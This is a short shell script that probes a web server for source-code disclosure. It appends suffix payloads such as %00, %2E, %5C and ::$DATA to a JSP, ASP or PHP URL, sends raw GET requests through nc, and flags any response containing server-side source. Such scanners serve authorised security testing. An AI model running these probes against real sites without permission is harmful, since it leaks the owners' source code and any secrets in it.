#!/bin/sh

# source disclosure vulnerability check

function usage
{
  echo "Usage: $0 <url>"
  exit
}

if [ $# -ne 1 ]; then
  usage
fi

# sadly '*' is expanded, sigh~
PATTERNS='. %2E + %2B %2A \ %5C ? %3F %20 %00 ::$DATA'

URL=$1
TEMP=`echo $URL | awk 'BEGIN { FS="/" } { print $3 }'`
HOST=`echo $TEMP | awk 'BEGIN { FS=":" } { print $1 }'`
PORT=`echo $TEMP | awk 'BEGIN { FS=":" } { print $2 }'`
REQ=`echo $URL | awk 'BEGIN { FS="/" } { for (i=4; i<NF; i++) printf("%s/",$i) }'`
FILENAME=`echo $URL | awk 'BEGIN { FS="/" } { print $NF }'`
EXT=`echo $FILENAME | awk 'BEGIN { FS="." } { print $NF }'`

if [ -z $PORT ]
then
  PORT=80
fi
  
if [ $EXT = 'jsp' -o $EXT = 'JSP' -o $EXT = 'asp' -o $EXT = 'ASP' ]; then
  SRC='<%'
else if [ $EXT = 'php' -o $EXT = 'PHP' ]; then
  SRC='<?'
  fi
fi

for PATTERN in $PATTERNS
do
  RESULT=`echo -e "GET /$REQ$FILENAME$PATTERN HTTP/1.0\n\n" | nc $HOST $PORT | grep $SRC`
  STRLEN=`expr "$RESULT" : '.*'`
  if [ $STRLEN -gt 0 ]
  then
    echo "http://$HOST:$PORT/$REQ$FILENAME$PATTERN is vulnerable"
  fi
done
